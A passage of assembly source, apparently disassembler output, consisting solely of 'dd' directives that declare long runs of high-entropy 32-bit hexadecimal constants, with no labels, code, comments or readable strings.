dd 4AC349C1h, 285B0BD5h, 0FFD6F6D1h, 0F73C821Ah, 7DF5C0F1h
dd 0D841CC3Eh, 0BE2E18ECh, 0D0AC4041h, 1A2C9CA0h, 7F5ED5ADh
dd 5496EE2Fh, 0F86470BDh, 8841E64Fh, 0EEF406Dh, 63331E0Eh
dd 0F5DC4993h, 652DC0F0h, 0FE6E223Ch, 0A33A8D61h, 2D58BD04h
dd 0DBB83C5Ch, 0EF340828h, 37DF5265h, 8FE3BC7Ah, 0A56BCC03h
dd 0DEE733D0h, 0FF88D082h, 0FFC4F512h, 516DCE52h, 94B35B1Fh
dd 2E0A1219h, 0B7FA46AFh, 0EBC15F4Ah, 52FE2FF1h, 0A699781Bh
dd 0C1AE1CA6h, 0EACD4F2Fh, 954779A6h, 368B8AA4h, 0DAEDAC96h
dd 433CEC77h, 0DB33D4BCh, 84A0966h, 0BDAABA66h, 0DF8E09A1h
dd 18A08E11h, 0F3C6C6FEh, 0AA26EDA0h, 0A6068E19h, 99442957h
dd 0AF24B5D9h, 288C7DCCh, 636032D2h, 8CB4B40Eh, 0D3EC5540h
dd 58B476Ah, 9B8E19CCh, 610B0A05h, 53DB1787h, 6B33545Ah
dd 36F6084Eh, 33470ECFh, 0D4AFDA2Bh, 0C9EA9729h, 0AED374Ch
dd 13F57E8Ah, 38D68E6Eh, 42F16BE9h, 0FE2FEB29h, 56A288F6h
dd 65A4C0EAh, 0AF60D232h, 8DFCC691h, 5F8D7DD0h, 0F06E2EE6h
dd 4B537EEBh, 3FEA4AFEh, 71ACDFDCh, 573EE85Ah, 165FEF3Ch
dd 8BC1AD9Bh, 0D6E685DCh, 0DDE92ECEh, 46C5ABF6h, 0E24C1991h
dd 481F5A59h, 0BFA2B25Ch, 13DCDF82h, 0F13199B5h, 29CAE82Eh
dd 0D4694A62h, 9AB0A6AAh, 0E28A591Ch, 0FB2815CFh, 596CC957h
dd 9AEF3AE9h, 1F39178Eh, 0FFA0F14Bh, 0EC5EA054h, 5FB9D68Ch
dd 0B9FA493Ch, 2CEAE693h, 0A65DD3B2h, 702560E4h, 7AB8F9C0h
dd 0AD57D10Ah, 0EC4D29B8h, 0AFF23DD7h, 0B5D8B292h, 0BE5F829Ch
dd 26DE6E2h, 9B2BD5D8h, 65F3A635h, 64B15288h, 222B5F42h
dd 3DF914DDh, 0BA576641h, 65CEE45Ch, 13D2CF96h, 67712A3Fh
dd 729527E1h, 0C06BBB3Bh, 213C21CEh, 0FADDE836h, 1120DE1Dh
dd 82B70693h, 7EB1E2C2h, 0DE65A18Ah, 3CE4E12Eh, 986F7F67h
dd 0AAE3BEB2h, 0FB74A904h, 0BB57A12Ah, 0A67A3A3Bh, 5FAEBFACh
dd 562B92Ah, 35175C3Ch, 0DE1AD8BEh, 0DD7AF6FEh, 0A7457768h
dd 9435E373h, 0C3AA352Fh, 237304B3h, 450B7664h, 6BEE1CD6h
dd 1EF4052Fh, 0A63346FFh, 0CD810416h, 45FF812Fh, 0BC7EEE3Ah
dd 1D993BCDh, 0BE4E14EDh, 0AB463C44h, 0F1296112h, 0C7EF7DADh
dd 0CF95C0E5h, 0CAAA2EB9h, 0E5134CFAh, 972E376Bh, 0AE7F71B4h
dd 0F856AC89h, 5BDC50h, 9554D554h, 45DF9AF9h, 0FDBCB71h
dd 32350BBDh, 1E104522h, 14C125D4h, 0F6A3AA97h, 0BD6FCF1Ch
dd 980C063h, 0C3E67715h, 67E59C73h, 26B62F82h, 0A5096A75h
dd 0D05B7AF6h, 9136BF4Ah, 2E29FBF3h, 9DD81089h, 94F87D6h
dd 7A0A48E6h, 0D6B74A5Dh, 0A5CA47E8h, 1BE302A7h, 319B8DF4h
dd 0E9330D13h, 5945C5EBh, 0E0BE76D0h, 79224995h, 4D0AD61Fh
dd 49ADF8Ah, 24362B92h, 0C6CB85F4h, 611D7A5h, 0CAFF48C1h
dd 0BC95EEABh, 92FEB816h, 0CBE1F9E9h, 9D525AB4h, 5151B453h
dd 69B31298h, 2AFF1A34h, 5A589669h, 857C0902h, 56EE69DAh
dd 0F5C38C92h, 8D38A68Ah, 0C360F1BFh, 739DEB1Ch, 3159F03Ch
dd 0A74A4EBDh, 0B6742649h, 6E31A16Ah, 91F65958h, 4296C317h
dd 8319BE05h, 0E1C8827h, 57472B52h, 7DEFE457h, 72C128BAh
dd 20FDD31h, 0CC7B5FEFh, 0C566C2A4h, 84F1789Eh, 0B758B6CFh
dd 0BE6D795Ch, 89887CEBh, 68C2C555h, 0CE25766Dh, 813FE514h
dd 5995DE09h, 7A9A0BF6h, 0E22F6F6Dh, 0C4BDBADCh, 0BC881FDh
dd 85779639h, 0D61E9A09h, 6B620B54h, 0B9E721D5h, 0C73B84Eh
dd 0DBF67152h, 0B2FEB07Eh, 0EFB76112h, 0F1D36CBEh, 2A008D2Fh
dd 0B27543E4h, 0A2FE12BFh, 0E74D5080h, 0D48F35D2h, 0A2DFB945h
dd 3FD83283h, 73B4DAD3h, 6ED9835Bh, 3F347775h, 585A7685h
dd 74280F13h, 348AEDB0h, 0E45A132Ch, 0B07AA38Bh, 3418211Fh
dd 0EB53FF63h, 6D155018h, 595B3985h, 0FF59FB1Dh, 0B1D17B62h
dd 0D7C4C5F6h, 0A7095E95h, 0E34BEEB6h, 405451AAh, 751E2D5Ch
dd 6D3A0770h, 0DD3A7778h, 0AFE595C4h, 2381582Fh, 0FE835549h
dd 0CFEC5B57h, 26E27465h, 0FBFBEFDEh, 0A92CF106h, 8D84F780h
dd 9508A1F8h, 30A28144h, 9EFA7DD1h, 144EDB9Ah, 0D959A01Fh
dd 54FE9C6Bh, 36F92E21h, 9DF6584Ch, 85315FB6h, 15279BBCh
dd 0D0C5A532h, 551CF1FFh, 49D35341h, 0D965D45Bh, 0D81324D0h
dd 2DB6F26Ch, 0A22FBB8Ch, 27B79D68h, 2FD170DBh, 2ECA69E1h
dd 0F191CEB5h, 0B9AC18D6h, 0F712490h, 924CEE96h, 69BB2AFBh
dd 8F17C0FBh, 0CAFD4EAFh, 5EF8F3ACh, 78F7473Ah, 2ADABCEBh
dd 0F341F6B7h, 0CF92DE75h, 9A45871Dh, 7B7D465Ah, 2B2CD567h
dd 2A71ACABh, 915726B5h, 20B377ABh, 3DA731B4h, 0F03D649Bh
dd 862FA95Eh, 3957B9E4h, 8AD49070h, 395CA57Eh, 0A9FA88FFh
dd 0B43F4ACBh, 2B4DB052h, 31859D04h, 9FE90925h, 3D7D10Dh
dd 97F81427h, 39B8875Ch, 45542578h, 0C8FCDC2Eh, 0CCC92439h
dd 6C8C1144h, 0A184ED1Fh, 6D2809F7h, 4D6C2E37h, 8BFCDCB2h
dd 0AEB6B2D5h, 33153A12h, 65553C0Ch, 0A6A2F89Ch, 8987B375h
dd 0EB00CA22h, 207146D2h, 0C21B2F9h, 66E05A99h, 898ECC64h
dd 2EF10B7Ch, 0AFD8EBBFh, 0E108F633h, 7911EA6Fh, 0A5D98EBCh
dd 2CF4BC61h, 0DD5D869Fh, 0B8E6A377h, 0D86B155Dh, 2BD8BAE9h
dd 446B6D6Fh, 87775D99h, 82E603EFh, 5B83B1D2h, 0BF2AA63Bh
dd 0C55FA05Eh, 474FF7F6h, 0A43AE1F9h, 3774DF4h, 6A9DF95Ch
dd 0D83F54ECh, 0DA3B56B0h, 783FDAC5h, 0B5A0B88Ah, 6D7CBEFAh
dd 55329F4Eh, 5A057062h, 0FEE83C1Bh, 68CA3B77h, 867D44E3h
dd 0DF0E0D49h, 0D1905AA3h, 2AEA5D4Ah, 0C32A9F6Fh, 0BF89882h
dd 2C87E97Bh, 2B43B137h, 0BE3574BFh, 7151C8E4h, 7BE5EF26h
dd 0AAF526D0h, 0FB0BA217h, 0E8BB3B8Eh, 0EC3F60DDh, 0A633B428h
dd 0D9E3132Fh, 468D71BAh, 13559879h, 0E566C0F9h, 18B667BDh
dd 0F77C272h, 2BB46CEEh, 0C67E337Bh, 36DD6723h, 0AFD404E4h
dd 61BE0358h, 0FE3B3A13h, 0F269213Bh, 7911E198h, 3BFC97B4h
dd 9F1FF5Ah, 0A45FED2Ch, 578A6C47h, 3176AD5Bh, 377DF502h
dd 2D524008h, 738F0F3Bh, 0E5218CD7h, 79F79ECBh, 255D0F0Fh
dd 0B8F33206h, 8958EF04h, 0E2E84556h, 4C035069h, 0F6CC8543h
dd 539D849Dh, 4E79B31Bh, 85F9FB6Ch, 20EDB175h, 0BF127977h
dd 7F278525h, 402289Fh, 25FA0793h, 3BBD1924h, 0B2EF2DDFh
dd 0BFD3113Ah, 839F44DAh, 0C9135DE2h, 5F5BED63h, 31F8C72Eh
dd 1F13AB47h, 17BE3F04h, 6AA245F6h, 2DA2FC20h, 6F1E68D6h
dd 0C2E1A106h, 6E18C088h, 79FCBF80h, 5E7B357Fh, 0F39F0D39h
dd 163D103Eh, 64FB9A69h, 0F0ECBFFh, 3C95367Eh, 51920A19h
dd 0C9F10CCDh, 0CDE080ADh
dd 6BEFE77Ah, 0F955922h, 953C15BEh, 34C97EBBh, 27E7AC4h
dd 957CE47h, 1E6FF149h, 77E8A8B8h, 958A72B9h, 0A49A28B1h
dd 5C9DA450h, 6BE02EE5h, 1BE151A8h, 0DDDB3CE7h, 0D0ED761Eh
dd 0A354A1F0h, 9AEB839Eh, 76CA5675h, 0C97073A7h, 0CE89614Ah
dd 0B0960AE9h, 0D77E4C5Bh, 0B0DB159Fh, 164AFE02h, 87744AE9h
dd 94959DA2h, 0A8829A48h, 0AEB5578Fh, 0D65F5EA3h, 3E14A6B2h
dd 0AD65E9B2h, 59689312h, 6860A8E5h, 0DABD41A4h, 0E93F7B11h
dd 656EC9B2h, 0D73AD62h, 0E041AC92h, 6CA1BECAh, 8ECD9A2Bh
dd 0F98FC083h, 2BEA70D5h, 0F31D7DEAh, 0DB010267h, 28E06A55h
dd 581FCBF2h, 298DF0A3h, 7134551Eh, 8E49CDA8h, 90199B4Eh
dd 0AA70DC3Eh, 3BF36154h, 8576C87Eh, 97FB118h, 0D39306D2h
dd 59E16E48h, 0D2161318h, 888751D5h, 0E216C063h, 78340CCDh
dd 4655243Ch, 6FA23F1Bh, 0FFDA4012h, 353AA4FAh, 23315E80h
dd 6939180Dh, 4169D23Dh, 0CD8BF8D8h, 8CD6C051h, 35F54D99h
dd 50ABA80Eh, 6C86E325h, 0DDAB62FEh, 9CD2C88Dh, 471927B3h
dd 0AB80B6BAh, 0D05CDE60h, 75CF5DFEh, 9F7E1932h, 0FBDD5436h
dd 56FF929Ah, 6692AC3Eh, 8E76428Bh, 0BF8BE963h, 0DD22A39Eh
dd 96E54D53h, 186BC2F7h, 4DA74EAFh, 0C45B63BCh, 0F13B725Dh
dd 6A618911h, 2E399C94h, 295D2CE9h, 0DB08524Dh, 9D08F27Ch
dd 0CF44D707h, 0DFD25DEAh, 9EAD964h, 0AF3551ECh, 5A22968Bh
dd 394F7174h, 1E2CCEBDh, 0C07FD52Ch, 42FD92A0h, 31820BA0h
dd 9229ABFCh, 9297CE7Ch, 0C3995C5Dh, 0A94CD729h, 0F6AAAE0Eh
dd 54D25F03h, 0BD835B62h, 5B88FC69h, 47F879A2h, 0F6A7D2B3h
dd 8E48791Eh, 319598FDh, 9DD61FC6h, 549603CEh, 66EA739Eh
dd 54FE340Ah, 88AA3D11h, 0B1C3BD20h, 0BBDB8D16h, 0D371F17Fh
dd 6A4AAF65h, 7B31A07Dh, 0B2A5CEC3h, 0E8BE9CACh, 0AB7F328Ah
dd 7072AF7h, 0EDDEEB13h, 70159C5Bh, 0EAFBBE98h, 0E7E0F15Bh
dd 0A3D49DF5h, 113AACF7h, 63D616A6h, 18F3AA37h, 9365AEE5h
dd 0A8BC60E4h, 32030281h, 1254DF0Fh, 0B54608D4h, 0EA04AC20h
dd 0F9392A0Bh, 9A737B7Ah, 2B594B45h, 62714284h, 2F7D4A9Dh
dd 6DB26D51h, 57DAE1F8h, 0E13BE0C0h, 30CE3A40h, 0FBA738ABh
dd 0C9EE0F62h, 98274625h, 199BBE61h, 0F26662B3h, 0A91FA2AAh
dd 2EAB556Dh, 7B0DAED8h, 69E18CE3h, 2ED49A16h, 11F8C0F7h
dd 0DB974AABh, 0F08189B7h, 3375993Bh, 47B9482Ch, 0A56988F4h
dd 8BB4BAA3h, 6B66C8ABh, 0C8DB5D9Bh, 65F1FBCEh, 0A21CC5E6h
dd 2D11B791h, 0BFA6DACDh, 3F7D4C9Dh, 0B4BFE889h, 0CFADFAFh
dd 50F983BDh, 72E179DFh, 5333123Bh, 543F94F4h, 0D591BDBFh
dd 6360784h, 0FC644B2h, 0F69A2ED3h, 0F79CDADDh, 326718EEh
dd 0DCD216EFh, 777D7D0Fh, 0BBCCEB2Fh, 5E71A738h, 7E3F5499h
dd 428C72A8h, 3FCB86AAh, 0D1EB0F4Ah, 0ABDABFAEh, 3C8DAD46h
dd 5C422733h, 0D33395D4h, 4BDA83B3h, 46E620CBh, 22EA94D8h
dd 96859C58h, 0AAA45711h, 75E9030Ah, 0F020E921h, 0D4FA5C75h
dd 19559F38h, 0BFB6A752h, 6935EA49h, 0C1C4283Fh, 36770303h
dd 63BD6A36h, 38F14503h, 0FDF44CFFh, 0A9FD68FEh, 0E34C3193h
dd 0D0964DCAh, 3B94B06Bh, 995BC2E2h, 0E441AADAh, 0D8C3BD81h
dd 0BF62ADDBh, 0C0E3A0Dh, 0AFFA4B2Fh, 90485C4Ah, 293E655Ah
dd 1936AF0Ch, 0BDFEF05Dh, 1157D01Ch, 286266A1h, 57D9D8ACh
dd 0A38838F4h, 0D3EF8B6Eh, 5BCF975Ch, 568ADE1Eh, 31CF5DF7h
dd 0D50D9F7Fh, 0C89C7EE6h, 287BDB43h, 0BF770D79h, 76B962B1h
dd 0B436DCBDh, 33E1865Dh, 8617C7E5h, 4AD60D45h, 4E26B2E8h
dd 0CB121A56h, 31F51FA2h, 743AB379h, 0B3F04652h, 5FBB316h
dd 25A1FBF3h, 0D4F972A4h, 0B3EFA71Eh, 5E1C4069h, 6E389174h
dd 0B014B55Eh, 0AD97BEDFh, 0EFFBDCFBh, 7AD40CDBh, 43F7FFE8h
dd 532CDA16h, 0DA5FD77Fh, 0A1194E1Ch, 0E524A8D6h, 0D71F10DCh
dd 0FF8FFD6h, 360EF844h, 9BEF1DB4h, 0CFCF7C28h, 80F146A3h
dd 60DAB12Fh, 895DFCC4h, 0A699D87Ah, 281278CEh, 0A889BD85h
dd 0A81807D7h, 29B0EF7h, 0C0F02BEFh, 7010758Ah, 0A4D0AA05h
dd 3101177Fh, 0A4B2F8DBh, 0DF0E8011h, 18C51129h, 0DDC9B62Ah
dd 0CE74D2D4h, 6051E07h, 2852A57Fh, 0FBA8BD0Dh, 1B4DD695h
dd 0DA2601AFh, 2E498980h, 3AE47495h, 7DA141CDh, 541FA749h
dd 901CD298h, 41A5F0F1h, 44C648E6h, 954E826Fh, 6F535EAh
dd 6462369Ah, 9B9F950Ah, 0D9DBBE32h, 8CBA520Fh, 67B0FD9Bh
dd 35BC9904h, 5CDE1B3Ah, 20A117B7h, 9FCE6341h, 18D8CA51h
dd 0DB3F6016h, 6F55932Dh, 58D39038h, 0E0B32775h, 0C968561Dh
dd 7EEE6C8Ah, 0D0B48BBFh, 0CAEEDBA0h, 0ED8163A2h, 23F92992h
dd 4052F7C8h, 3C22BD83h, 1E54B4BBh, 0C4029E95h, 0F0B8EDDCh
dd 0A2572BA1h, 6D9D74Fh, 32B04CBAh, 0F4B4A839h, 0D778CADAh
dd 0C99046B4h, 40EF33EFh, 0D1CE8D9Ah, 556ADE03h, 0AD51CCD1h
dd 344F2179h, 1FBB9F3Fh, 34A63C0Dh, 5AF9FE66h, 50350EE4h
dd 7AA89497h, 0AAE8D69Fh, 8D050F63h, 9BCFB253h, 0E30C7A6Eh
dd 0A2CAC607h, 745BB849h, 56E582B9h, 9FF5DFC7h, 3B1FA05Ah
dd 94AC323Bh, 6BE9A070h, 0E7FA42A7h, 0DAFE681Dh, 0AD623FB6h
dd 0BFD092BEh, 0D5EDEDAAh, 529154E1h, 72CE1F28h, 0FE1EA4A6h
dd 0D150EEA3h, 29C2FEF6h, 7634D5F3h, 0D359636Ch, 0DC0097EDh
dd 0F3349B94h, 2848EE0Bh, 0ADCE71D6h, 0A7C538D6h, 0DD389863h
dd 608116BCh, 601800Dh, 21D41B0Bh, 0B5815DDFh, 808EF7CAh
dd 0EF09F09h, 4DEEF1B5h, 0F9AF1C19h, 8E6D7373h, 0E95C81EFh
dd 1AC80FC7h, 0CC4E9D8Ah, 0F4542B3Bh, 0FF72FFF5h, 868D0FA4h
dd 0E2FD87D6h, 118B08A5h, 0ABE61529h, 75A62DA1h, 0B2273BA9h
dd 34959C2h, 607CCE75h, 0D73F15A9h, 0E06717DBh, 47F2E3F7h
dd 75D5A475h, 0A2BDD353h, 0EDD5ACE5h, 56B37382h, 0B51C0F66h
dd 0B955E4D3h, 0FF47CEF8h, 9C5C7142h, 681AF235h, 0ACBCC15Fh
dd 45DD432Eh, 0EFCD313Dh, 0C0511549h, 775461F9h, 620D09CBh
dd 7735E023h, 0B57D5753h, 0E8A25764h, 0A9E2A6E1h, 0B93C93E5h
dd 39D6E1E7h, 9E455AF4h, 4AD11BD5h, 0F8D562A0h, 9F7F14A9h
dd 0FBDA0676h, 57B69CC2h, 0CB62C286h, 40F4010h, 0B16C8ABFh
dd 0CCA6DD02h, 96DBC103h, 0B2080EA2h, 0D14247D7h, 0D6BDAA01h
dd 7EC3090Ah, 4B94621Dh, 0AD6D4DBAh, 79B4D99Bh, 4ADD7AAAh
dd 0A856005Ch, 31D5B874h, 7B1F3F10h, 0A64E38E8h, 0C94CDC3Dh
dd 0C6519968h, 0FEFEFC9Ah, 0BBF75EB7h, 5EEE4B8Ch, 0B68DCC01h
dd 0AA9D212Fh, 50B80FF4h, 0A01681E9h, 7B8F1B5Eh, 678FD0FCh
dd 6C6B7F5Fh, 0E0340298h, 553D87D1h, 33E424AFh, 0E67BD104h
dd 70BBB1B1h, 9C1E16EEh, 86AC6BCh, 0F422C44h, 0EAF7DC9Ch
dd 0FD75B7B9h, 2B9DDFC7h, 0F56573DFh, 0E6BA8B3Bh, 1D213CFAh
dd 188D179Ch, 0EE5DB285h, 0BF2292FEh, 8FD65A61h, 2AF78925h
dd 0B12FB03Ch, 40F59FA7h, 2AACF2F4h, 97C8131Eh, 0A576B70Ah
dd 0DD86CBC1h, 0F2F0FA8Fh, 0CA537D5h, 0EF9B750Ch, 6F1C7E48h
dd 5F6666AAh, 84A2F86Ah, 21707003h, 1FEA7EE5h, 8B356CDAh
dd 0D5C7190Ah, 312DA4EAh, 766EB55Eh, 3C216565h, 3B05AE0Dh
dd 40530AD6h, 320DCA86h, 8EA88953h, 0F2076148h, 0FCA5056Ch
dd 96B7A498h, 62254E9Ch, 71B451B4h, 0BED54EB5h, 0FA8650B7h
dd 3A21AAFAh, 2BFDC0A4h, 8B9A9590h, 0A7530569h, 87BFB995h
dd 0CD8B3147h, 6FA850CDh
dd 0A81D3F7Ch, 8AEDED1Fh, 6DFBA15Ah, 7F7C5F30h, 0A0A79FA7h
dd 0C8832B9Eh, 301B52D6h, 87E0E0AFh, 202EDB4Fh, 3FF8E325h
dd 79479DC6h, 7005B0F0h, 8281DFC5h, 0DB9EB1BCh, 0F8795431h
dd 0D7BA48FEh, 36478096h, 0F6A4F0FCh, 0CFFDC0DDh, 226FEAC4h
dd 2669B0C5h, 946E1086h, 59A91F2Dh, 7E5C14ABh, 0BBA964E9h
dd 154D9600h, 853ADF6Dh, 0D36223E5h, 0BC4A3815h, 16CB48A3h
dd 36D6697Fh, 4F23435Bh, 4915C395h, 37484077h, 42FFAED8h
dd 65CAF66Ah, 0C795DF7Ch, 0FDF84E1Dh, 1563C0F1h, 5446F30Eh
dd 35E8BA0Bh, 0E4329A18h, 395010A9h, 0C9DF7C48h, 97B83480h
dd 0CF555A92h, 2378D375h, 89D6679Bh, 6F64B2D6h, 0F86E02EFh
dd 627D024Ch, 56579A41h, 5EEBC6ACh, 0DAC8F6FAh, 0C45D457Eh
dd 2A64562Fh, 953FCC3Fh, 0CDFD224Ch, 0AF07039h, 6730C155h
dd 597F1CF7h, 0C9BB53DCh, 8D283573h, 0A60A3C5Fh, 0CA6781DEh
dd 0A9B0E5EEh, 2BD0BA8h, 0EAFE6EB8h, 3AE10AA5h, 0F2253A9Bh
dd 56CD50C0h, 0F585B5ADh, 5B2F512h, 0A3DF4729h, 0DBD2B305h
dd 5DB064BFh, 0C078EFB6h, 0D01B1385h, 0A87EFB65h, 0B65799Eh
dd 34FC2303h, 0F7CEC8A3h, 0A6947E2h, 0F0D49B84h, 9C05573Bh
dd 13257BA4h, 0ACF0A475h, 14A2F6AFh, 4CC3B4BBh, 0DC439CF1h
dd 0DABCABF9h, 0D0459DF8h, 5ACBF4AFh, 5A2A5E59h, 5BBFA82Ah
dd 1C930E13h, 56765BAFh, 1F04EA7Dh, 5CAEFE53h, 277D8A7Ah
dd 77DBF289h, 457EA685h, 803E1B7Ah, 0B89DBAACh, 7C2D9B70h
dd 519AF4E4h, 775ED4A7h, 0E0FA5DB7h, 6A70D781h, 0C95D0CC9h
dd 0B9BC3A7Fh, 0E1AD68B4h, 0A25D0727h, 5DF1DC32h, 0F5BF334Ah
dd 0D50A4A96h, 0A0E1B0A5h, 553229Fh, 0A5EA5BBEh, 58ACC35Ah
dd 3ABB2992h, 554C3523h, 3A6B5A23h, 597F7BFEh, 79537AD0h
dd 88052F31h, 0AA5F4552h, 0E5CB3519h, 795D85C5h, 4AF08960h
dd 0AF7F191Fh, 5356DB74h, 0EF805D7Eh, 5C770FDBh, 55845ADBh
dd 7E30C929h, 2314A9h, 0F2917CAAh, 999468B0h, 0EE8A9668h
dd 2D4FE963h, 0D825271Bh, 7E1A7DE9h, 57389488h, 0BACA9BF0h
dd 101902B3h, 5AEB7B37h, 98EA0646h, 3BD516F2h, 41717E92h
dd 50A95FF2h, 7050ADCFh, 0FE6A4AA0h, 361E8840h, 99F01E0Ah
dd 205B9316h, 0BC4B97DEh, 9551DD92h, 6A4F2E97h, 0B72DC5h
dd 6519F1C9h, 6A69DBh, 8BEE3750h, 0D2E082F2h, 0B57BF1C5h
dd 8BD3F023h, 13B347E3h, 5886992Ch, 8FBAEFB7h, 0F383B4D6h
dd 7B8BC413h, 0CBC1D6C5h, 323D5FBh, 0D763E343h, 25DA6077h
dd 50605FAAh, 9A79A9C4h, 0BD7B77E8h, 0A43E0C0Ch, 5C8C16BEh
dd 0C655B11Dh, 3A8222EAh, 0EFE93553h, 8B51E9A3h, 0F8D345F8h
dd 2D17730Fh, 6B2E402Dh, 6D377CAh, 5BB4A9BCh, 0B65787E5h
dd 967EC4D9h, 0C7A23A08h, 87AD73E4h, 0A8F8B305h, 0A0BDB4DEh
dd 0B7A4C85h, 0B9CB4FBBh, 73A8EDAh, 7478660Bh, 0A575F99h
dd 55178C99h, 0F8EBB8E6h, 0C2EEB72Fh, 8974B312h, 0C7B2FC6Bh
dd 44E1A801h, 51300ABCh, 4E838DEAh, 0DFA3F6Bh, 3C86F26Eh
dd 0CDF7CF7Fh, 303FDF0Ah, 97238DE7h, 0BAF53F34h, 4274985Dh
dd 9C03CB27h, 0CF92FE52h, 0EEB6DECCh, 0EF96DC48h, 74B7E93Bh
dd 476806C5h, 0A713EEEDh, 60D06DAAh, 0ADEAE462h, 0F14DF3FFh
dd 5D5C90D4h, 0F6AC8E63h, 2F96E115h, 0F47614C9h, 0CDACA25Fh
dd 3230253Ch, 23EEA8Fh, 0C4C3F3E6h, 78BFB3A5h, 42AD9A9Eh
dd 3A2BB067h, 0CFB7A1D6h, 48AA930Bh, 272CAFADh, 86112BBFh
dd 6DFE8956h, 30F52281h, 0C248AC4Ch, 277CD7C1h, 39D6647Ch
dd 0EB4FD421h, 0FA971316h, 0B96BAA6h, 75FCDC7Ch, 58F30A54h
dd 0D13F6FDAh, 2935438Bh, 0A7281DACh, 71DFF74Eh, 10BB1177h
dd 0C9BD5743h, 0D338C74Ch, 39467B6h, 5A990B04h, 0E184ADE2h
dd 85227287h, 583914F7h, 5A7BFE6Ah, 819666A9h, 0EB96659h
dd 83329BCCh, 8A567FA7h, 0B3530856h, 0FE3E8B35h, 7E05004Ch
dd 0A5A6F91h, 170B06F1h, 45E0FF77h, 9802963Ch, 59925F03h
dd 0EAA8B527h, 3513D68Ch, 757B8967h, 5EBC4DCFh, 593E9191h
dd 479A1E92h, 701DFE0Fh, 0D19E5569h, 0B2B8D295h, 6FBD995Fh
dd 0AEF426A5h, 20DB1C71h, 0ED5D4154h, 166E190Ah, 22826719h
dd 0A389788Dh, 1BD62F8h, 0AAF26DB0h, 9961C3C8h, 957F1533h
dd 0D728D7F3h, 0DEABA247h, 8191CA23h, 0D68C2AC0h, 0BFE1C615h
dd 0D5C00098h, 3A716ED5h, 6C0FD2F5h, 36E23CD0h, 0E73F1AC9h
dd 513A5082h, 3793A766h, 8EE9B8CBh, 12D37FFh, 0F854E06Dh
dd 4813C515h, 0F2817A32h, 0EB2BEE3Ah, 289DAE75h, 0F6B0D9BBh
dd 5CAF12BBh, 2FF13C9Eh, 711BD73Eh, 247DFCF5h, 883497F1h
dd 0D886CA11h, 0F38319B0h, 7E0B5004h, 0A96478Ah, 87775F17h
dd 7B774A71h, 0A5760664h, 535D69FDh, 5EF5C24h, 42EB743Fh
dd 7486B083h, 43378116h, 0EDD3E66Ah, 0D94E8E05h, 99B8E4AAh
dd 7E65F253h, 0CD22D5DFh, 6323D934h, 0EC243D0Dh, 24A1CB14h
dd 3E84D9Ah, 383ECD89h, 41DBA857h, 8133A86Dh, 0C7EB964h
dd 69AD2D4Fh, 0F6A1249Dh, 0CDC19181h, 0ED78F83Bh, 7CE6C49h
dd 10E6E715h, 0C3B4F581h, 45F563D1h, 0F2318ACh, 0CEDDF6ECh
dd 65B31BF3h, 933F1A0Ah, 9B7E5158h, 3E54CEB6h, 0F4247C0Ch
dd 654A8C7Dh, 104B7535h, 342D6D5Ah, 9B85FCCCh, 0E333142Bh
dd 357364C7h, 0D86FAD20h, 0E39F3D6Ch, 0F3627EDAh, 0C73378ACh
dd 6E3C4BA3h, 0F9DCEFC5h, 0AF503186h, 0D223DAEAh, 0FB71B372h
dd 0FD528594h, 32A1E9A5h, 0DFF35EF5h, 0F7D8D13Ah, 0FF20E715h
dd 26BA33AAh, 2E166CF7h, 33BBA57Fh, 37CF1151h, 0F7135FB0h
dd 3214857Bh, 0F5275770h, 3EF69767h, 0EA888176h, 0B98B4532h
dd 0BB410B18h, 21E9BF1Ch, 2EEC157Fh, 9C35608Eh, 0FA3BF347h
dd 0D50247EAh, 5500DA36h, 0E19DE7D4h, 0E3EE2D64h, 8F73C5D9h
dd 303CFE34h, 0A3F7EC77h, 41F0BA77h, 7BEC80CEh, 7B7516Ah
dd 373E2ABBh, 597312BEh, 0B33232BEh, 0BC05A5D8h, 68F4B53Bh
dd 0EBABDB93h, 0D06BD07Dh, 0B12F901Ah, 0D54A3D4Fh, 0E0FA04AFh
dd 7A2657CEh, 0E3EA3579h, 568DFD75h, 7A0A61C0h, 0EF1A475Fh
dd 52809C2Eh, 58182C79h, 2DAA9827h, 60381C86h, 96E23AC9h
dd 626D87B1h, 0CED8CAB0h, 0D6A84994h, 6F8B63B3h, 8FC618FDh
dd 8A8584F8h, 0A986ED97h, 159946D1h, 0F72CE1A1h, 0F1FF1965h
dd 0D7195706h, 0F7B2BDFDh, 0DD922D0Bh, 5BEEC8B8h, 5FAB366Ah
dd 35516A4Ah, 0E575ED7Dh, 0BFDBF045h, 8716B9F0h, 5EB4284Ch
dd 52D87101h, 0AAB7B5E9h, 968947BAh, 93EC1DB8h, 0FC63EDDh
dd 0DD836275h, 0DDD2FC94h, 574A91A4h, 0F2F15453h, 8EB8242Dh
dd 0EB9765B8h, 6CB49ACCh, 30A85A8Bh, 0DB8268FCh, 54D562F8h
dd 4A92A27Fh, 72A36481h, 0B8AAFA5Ch, 4437AE4Ch, 0E5E7142Bh
dd 0F4E8582Ch, 625FD812h, 0BBDC471Fh, 0B3379323h, 6914774Ch
dd 5ACE973Ah, 0DAB96255h, 0B34EE2BBh, 0BB6B74D9h, 0EF903541h
dd 0DCC8AA8Ch, 0BFE9E61Fh, 1BF9E4DFh, 81369C52h, 1D08CF51h
dd 0C330FBD8h, 1F7EF04Eh, 0F50B5F7Eh, 0A5E5D3D2h, 915D7765h
dd 0CFB3F5CCh, 8B6005DCh, 1FED83C8h, 57B47D11h, 12182EC9h
dd 492D5BE5h, 0EC6D3ABCh, 24DB949Eh, 4CD44331h, 0ADBA5F5Ch
dd 0B6A4BA02h, 410D1554h, 7D4F29E4h, 5D92A401h, 3F9228EFh
dd 1AC918BAh, 0F1C0D8E6h, 66E6F1D5h, 0E1439C19h, 291C7FBCh
dd 1F66B03Dh, 55D8DAAFh, 0CFB4E174h, 0EBF3C090h, 0F1110FF0h
dd 7C41272Ch, 244F0FCAh
dd 0F15619B3h, 0DFBA454Ch, 6FCA6670h, 2D1B414Ah, 0FECBF999h
dd 1BCC0ECBh, 0FDA7F4BFh, 65DAC875h, 0BFBBFF2Ah, 0A135E664h
dd 49780531h, 597EA4E7h, 0F8AD320Ch, 3F3534B6h, 8799FA17h
dd 4E1DEEC7h, 0A19039CFh, 0BD253A3Fh, 60182AB0h, 0B2E45616h
dd 0AFF5EA6Fh, 0E155E85Ch, 154CEE44h, 774234B7h, 5DE859B9h
dd 8DD44244h, 646395FCh, 0E2D51D6Eh, 0C7DA6CAEh, 159378Fh
dd 0A42C0770h, 0C3BC4BE9h, 9BCC9057h, 5F9F2316h, 0CBEAF6A0h
